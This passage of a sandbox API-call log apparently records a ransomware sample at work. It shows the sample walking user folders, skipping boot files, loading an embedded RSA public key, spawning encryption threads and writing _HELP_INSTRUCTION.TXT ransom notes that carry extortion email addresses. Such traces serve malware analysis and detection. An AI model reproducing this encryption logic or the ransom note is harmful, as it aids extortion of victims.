(lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="NTLDR") returned 0x0 [0101.718] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0101.718] StrStrW (lpFirst="8DFF43342C68841C83BDE75D30616864.XZZX", lpSrch="ntdetect.com") returned 0x0 [0101.718] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0101.718] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0101.718] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0101.718] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.718] lstrcpyW (in: lpString1=0x17cf1c, lpString2="8DFF43342C68841C83BDE75D30616864.XZZX" | out: lpString1="8DFF43342C68841C83BDE75D30616864.XZZX") returned="8DFF43342C68841C83BDE75D30616864.XZZX" [0101.718] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f4 [0101.719] Sleep (dwMilliseconds=0x96) [0101.874] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0101.874] lstrcmpW (lpString1="FD82D02831F226B04645120F361F0AF8.XZZX", lpString2="..") returned 1 [0101.874] lstrcmpW (lpString1="FD82D02831F226B04645120F361F0AF8.XZZX", lpString2=".") returned 1 [0101.874] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0101.874] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="ntldr") returned 0x0 [0101.874] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="NTLDR") returned 0x0 [0101.874] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0101.874] StrStrW (lpFirst="FD82D02831F226B04645120F361F0AF8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0101.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0101.874] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0101.874] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 43 [0101.874] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.874] lstrcpyW (in: lpString1=0x17cf1c, lpString2="FD82D02831F226B04645120F361F0AF8.XZZX" | out: lpString1="FD82D02831F226B04645120F361F0AF8.XZZX") returned="FD82D02831F226B04645120F361F0AF8.XZZX" [0101.874] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.874] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f8 [0101.875] Sleep (dwMilliseconds=0x96) [0102.029] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.029] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0102.029] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0102.029] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0102.029] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0102.030] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0102.030] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0102.030] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0102.030] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*" [0102.030] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="Desktop") returned 0x0 [0102.031] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpSrch="DESKTOP") returned 0x0 [0102.031] SetErrorMode (uMode=0x1) returned 0x1 [0102.031] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT") returned 60 [0102.031] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0102.031] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0102.031] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x2fc) returned 0x0 [0102.031] RegQueryValueExW (in: hKey=0x2fc, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb4500, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cb4500*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0102.031] RegCloseKey (hKey=0x2fc) returned 0x0 [0102.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0102.032] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0102.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0102.033] CloseHandle (hObject=0x2fc) returned 1 [0102.033] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0102.033] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="Contacts" [0102.033] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0102.033] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0102.033] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0102.033] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.033] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0102.033] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.034] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0102.034] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0102.034] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0102.034] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0102.034] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0102.034] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0102.034] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0102.034] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0102.034] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0102.034] SetErrorMode (uMode=0x1) returned 0x1 [0102.034] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0102.034] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0102.034] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\" [0102.034] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0102.035] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0102.035] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0102.035] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0102.035] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*" [0102.035] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="Desktop") returned 0x0 [0102.035] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\", lpSrch="DESKTOP") returned 0x0 [0102.035] SetErrorMode (uMode=0x1) returned 0x1 [0102.035] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT") returned 59 [0102.035] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0102.035] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0102.035] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x300) returned 0x0 [0102.035] RegQueryValueExW (in: hKey=0x300, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb4730, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cb4730*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0102.036] RegCloseKey (hKey=0x300) returned 0x0 [0102.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0102.036] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0102.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0102.037] CloseHandle (hObject=0x300) returned 1 [0102.037] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0102.037] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0102.037] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0102.038] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0102.038] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0102.038] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0102.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0102.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0102.038] SetErrorMode (uMode=0x1) returned 0x1 [0102.038] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0102.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0102.038] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0102.038] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0102.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0102.038] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0102.038] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0102.038] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.038] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.038] lstrcmpW (lpString1="3wes.gif", lpString2="..") returned 1 [0102.038] lstrcmpW (lpString1="3wes.gif", lpString2=".") returned 1 [0102.038] StrStrW (lpFirst="3wes.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.038] StrStrW (lpFirst="3wes.gif", lpSrch="ntldr") returned 0x0 [0102.038] StrStrW (lpFirst="3wes.gif", lpSrch="NTLDR") returned 0x0 [0102.038] StrStrW (lpFirst="3wes.gif", lpSrch="NTDETECT.COM") returned 0x0 [0102.039] StrStrW (lpFirst="3wes.gif", lpSrch="ntdetect.com") returned 0x0 [0102.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.039] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.039] lstrcmpW (lpString1="cjwLkHotFDrB.csv", lpString2="..") returned 1 [0102.039] lstrcmpW (lpString1="cjwLkHotFDrB.csv", lpString2=".") returned 1 [0102.039] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.039] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="ntldr") returned 0x0 [0102.039] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="NTLDR") returned 0x0 [0102.039] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="NTDETECT.COM") returned 0x0 [0102.039] StrStrW (lpFirst="cjwLkHotFDrB.csv", lpSrch="ntdetect.com") returned 0x0 [0102.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.039] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.039] lstrcmpW (lpString1="CtU1cr28O6YeLq5MF4zr.mp3", lpString2="..") returned 1 [0102.039] lstrcmpW (lpString1="CtU1cr28O6YeLq5MF4zr.mp3", lpString2=".") returned 1 [0102.039] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.039] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="ntldr") returned 0x0 [0102.039] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="NTLDR") returned 0x0 [0102.039] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0102.039] StrStrW (lpFirst="CtU1cr28O6YeLq5MF4zr.mp3", lpSrch="ntdetect.com") returned 0x0 [0102.039] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.039] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.039] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0102.039] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0102.039] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.039] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0102.039] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0102.040] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0102.040] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0102.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.040] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.040] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.040] lstrcmpW (lpString1="FNPUDpYy3rwMi.flv", lpString2="..") returned 1 [0102.040] lstrcmpW (lpString1="FNPUDpYy3rwMi.flv", lpString2=".") returned 1 [0102.040] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.040] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="ntldr") returned 0x0 [0102.040] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="NTLDR") returned 0x0 [0102.040] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="NTDETECT.COM") returned 0x0 [0102.040] StrStrW (lpFirst="FNPUDpYy3rwMi.flv", lpSrch="ntdetect.com") returned 0x0 [0102.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.040] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0102.040] lstrcmpW (lpString1="FzoKie.rtf", lpString2="..") returned 1 [0102.040] lstrcmpW (lpString1="FzoKie.rtf", lpString2=".") returned 1 [0102.040] StrStrW (lpFirst="FzoKie.rtf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0102.040] StrStrW (lpFirst="FzoKie.rtf", lpSrch="ntldr") returned 0x0 [0102.040] StrStrW (lpFirst="FzoKie.rtf", lpSrch="NTLDR") returned 0x0 [0102.040] StrStrW (lpFirst="FzoKie.rtf", lpSrch="NTDETECT.COM") returned 0x0 [0102.040] StrStrW (lpFirst="FzoKie.rtf", lpSrch="ntdetect.com") returned 0x0 [0102.040] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0102.040] FindNextFileW (in: hFindFile=0x3a55d0, 